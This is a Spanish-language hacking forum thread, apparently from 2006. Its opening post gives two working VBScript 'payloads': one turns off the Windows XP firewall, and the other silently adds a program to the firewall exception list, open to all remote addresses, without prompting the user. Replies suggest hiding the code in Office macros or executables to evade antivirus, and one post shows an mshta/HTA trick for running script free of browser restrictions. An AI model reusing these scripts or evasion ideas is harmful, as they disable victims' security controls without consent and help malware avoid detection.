Páginas: [1] 
|
 |
|
 Autor
|
Tema: VBScript: Jugando con el Firewall de Windows XP :P (Leído 1276 veces)
|
|
||MadAntrax||
|
Bien, despues de documentarme un poquito se me ha ocurrido como diseñar unos sencillos scripts para deshabilitar el Firewall de Windows XP. Os propongo 2 métodos: Cerrar el Firewall de Windows XPEste script permite deshabilitar por completo el firewall de Windows XP, lo malo de este método esque segun la configuración del Centro de Seguridad del usuario, mostrará o no un globo de advertencia. '''''''''''''''''''''''
' Name: Disable_Frw.vbs
' Version: 1.0
' Author: ||MadAntrax||
' Website: foro.elhacker.net
' Payload: Disable the Windows Firewall. According to the user
' security preferences, it can appear a warning ballon.
'
'''''''''''''''''''''''
Set Firewall = CreateObject("HNetCfg.FwMgr")
Set Politica = Firewall.LocalPolicy.CurrentProfile
Politica.FirewallEnabled = FALSE
Solo hay que añadir que podemos cambiar el FALSE por un TRUE y así habilitar de nuevo el Firewall de Windows XP
Agregar de modo silencioso un programa en la lista de excepcionesEste es el método que más me gusta: Permite añadir la dirección de un archivo en la lista de excepciones del Firewall, podemos seleccionar algunos parametros tales como el nombre de la aplicación, la ruta y más cosas (adjunto también fotografia): '''''''''''''''''''''''
' Name: Add_App_to_Frw.vbs
' Version: 1.0
' Author: ||MadAntrax||
' Website: foro.elhacker.net
' Payload: Add a program to the exception list of Windows Firewall
' without prompting to user.
'
'''''''''''''''''''''''
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
Set objApplication = CreateObject("HNetCfg.FwAuthorizedApplication")
objApplication.Name = "ElHacker.net - Aplicación"
objApplication.IPVersion = 2
objApplication.ProcessImageFileName = "C:\Windows\System32\calc.exe"
objApplication.RemoteAddresses = "*"
objApplication.Scope = 0
objApplication.Enabled = True
Set colApplications = objPolicy.AuthorizedApplications
colApplications.Add(objApplication)
|
|
|
|
|
En línea
|
|
|
|
Mancebo
 Desconectado
Mensajes: 2.792
|
El segundo método la verdad que tiene su jugo, esto y las Excepciones del Nod32 por Thor se podría hacer algo interesante.. jijiji.
|
|
|
|
|
En línea
|
|
|
|
.NiXoN.
Desconectado
Mensajes: 942
Ubuntu user :D
|
Wenas....  No es por delisuionar pero me parece que X antivirus no permiten la ejecucion de scipts VB.....desde que salio el virus I love you... CREOSaludos... |
|
|
|
|
En línea
|
El que todo lo sabe sabe que no todo lo sabe   |
|
|
|
||MadAntrax||
|
jeje, mirate el post de: Vulnerabilidad en ActiveDesktop de WinXP SP2http://foro.elhacker.net/index.php/topic,87672.0.html(esta pegado en este foro con chincheta) Habla sobre como ejecutar código scripting (vbs, js, etc) pasando por alto la protección del InternetExplorer y en muchos casos el analizador de objetos script de los AV. Aparte, este código en VBS se puede embebir en una macro y meterlo en archivos de office (word, excel, powerpoint, etc) o incluso dentro de un ejecutable programado en Visual Basic 6 o .Net y evitar por completo los Antivirus Asi que no digas que no sirve, porque da mucho juego  |
|
|
|
« Última modificación: 23 Junio 2006, 17:11 por ||MadAntrax|| »
|
En línea
|
|
|
|
oRTNZ
Desconectado
Mensajes: 814
no no soy malo... soy vicioso :p
|
||MadAntrax|| , Hace rato te las traes,es interesante lo que planteas y mas aun me gustan las macros ,por cierto el Vbs en macros es VbA, saludos  pd. Amo las Macros |
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
.NiXoN.
Desconectado
Mensajes: 942
Ubuntu user :D
|
Wenas..  jeje, mirate el post de: Vulnerabilidad en ActiveDesktop de WinXP SP2http://foro.elhacker.net/index.php/topic,87672.0.html(esta pegado en este foro con chincheta) Habla sobre como ejecutar código scripting (vbs, js, etc) pasando por alto la protección del InternetExplorer y en muchos casos el analizador de objetos script de los AV. Aparte, este código en VBS se puede embebir en una macro y meterlo en archivos de office (word, excel, powerpoint, etc) o incluso dentro de un ejecutable programado en Visual Basic 6 o .Net y evitar por completo los Antivirus Asi que no digas que no sirve, porque da mucho juego perdona, disculpame, CREIA.... Saludos.. |
|
|
|
|
En línea
|
El que todo lo sabe sabe que no todo lo sabe |
|
|
|
||MadAntrax||
|
||MadAntrax|| perdona, disculpame, CREIA.... Saludos.. Jeje, no pasa nada hombre, saludos  PD, es verdad, el código VB usado en macros se conoce como VBA, merci por la aclaracion |
|
|
|
|
En línea
|
|
|
|
|
sirdarckcat
|
Hola! Tambien lo puedes llamar por mshta.exe algo asi: Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrador>echo open();>lolz.js
C:\Documents and Settings\Administrador>echo ^<script src="lolz.js"^>^</script^>>lolz.hta
C:\Documents and Settings\Administrador>start lolz.hta
C:\Documents and Settings\Administrador>exit mshta es tan habil como internet explorer, pero sin limitaciones , puedes llamar a cookies de otros dominios, hacer peticiones TRACE etc.. Saludos!! |
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 
|
|
|
 |
